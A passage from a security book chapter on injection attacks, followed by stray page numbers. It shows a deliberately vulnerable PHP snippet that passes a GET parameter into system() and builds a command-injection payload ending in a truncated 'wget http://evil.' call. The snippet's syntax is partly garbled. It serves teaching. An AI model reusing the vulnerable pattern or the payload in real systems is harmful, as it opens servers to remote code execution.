Consider the following PHP code snippet:
$email_subject = "some subject";
if ( isset($_GET{'email'})) {
system("mail " + $_GET{'email'}) + " -s '" + $email_subject +
"' < /tmp/email_body", $return_val);
}
?>
The user sends his or her e-mail address in the email parameter, and that user input
is placed directly into a system command. Like SQL injection, the goal of the attacker
is to inject a shell command into the email parameter while ensuring that the code before
and after the email parameter is syntactically correct. Consider the system() call
as a puzzle. The outer puzzle pieces are in place, and the attacker must find a puzzle
piece in the middle to finish it off:
mail [MISSING PUZZLE PIECE] ??“s 'some subject' < /tmp/email_body
Chapter 1: Common Injection Attacks 11
The puzzle piece needs to ensure that the mail command runs and exits properly. For
example, mail --help will run and exit properly. Then the attacker could add additional
shell commands by separating the commands with semicolons (;). Dealing with the puzzle
piece on the other side is as simple as commenting it out with the shell comment symbol (#).
Thus, a useful puzzle piece for the email parameter might be this:
--help; wget http://evil.
Pages:
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72